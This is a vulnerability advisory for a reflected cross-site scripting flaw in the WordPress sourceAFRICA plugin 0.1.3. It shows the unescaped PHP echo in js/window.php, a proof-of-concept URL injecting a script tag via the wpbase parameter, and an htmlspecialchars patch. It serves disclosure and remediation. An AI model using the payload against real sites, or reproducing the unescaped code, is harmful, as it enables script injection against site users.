WordPress sourceAFRICA 0.1.3 Cross Site Scripting

2015-08-29T00:00:00
ID PACKETSTORM:133371
Type packetstorm
Reporter Ehsan Hosseini
Modified 2015-08-29T00:00:00

Description

                                        
                                            `######################  
# Exploit Title : Wordpress sourceAFRICA Plugin Cross Site Scripting  
# Exploit Author : Ashiyane Digital Security Team  
# Vendor Homepage : https://wordpress.org/plugins/sourceafrica/  
# Date: 2015-08-29  
# Tested On : Elementary Os - Firefox  
# Software Link : https://downloads.wordpress.org/plugin/sourceafrica.zip  
# Version : 0.1.3  
######################  
# Vulnerable Code:  
# File: js/window.php - Line 18-19  
  
<script src="<?php echo   
$SITEURL;?>wp-includes/js/tinymce/tiny_mce_popup.js"></script>  
<script src="<?php echo   
$SITEURL;?>wp-includes/js/tinymce/utils/form_utils.js"></script>  
######################  
# POC :  
http://[URL]/[PATH]/wp-content/plugins/sourceafrica/js/window.php?wpbase="></script><script>alert("xss")</script>  
######################  
# Patch:  
# File: js/window.php - Line 18-19  
  
<script src="<?php echo   
htmlspecialchars($SITEURL);?>wp-includes/js/tinymce/tiny_mce_popup.js"></script>  
<script src="<?php echo   
htmlspecialchars($SITEURL);?>wp-includes/js/tinymce/utils/form_utils.js"></script>  
######################  
# Discovered By : Ehsan Hosseini  
######################  
`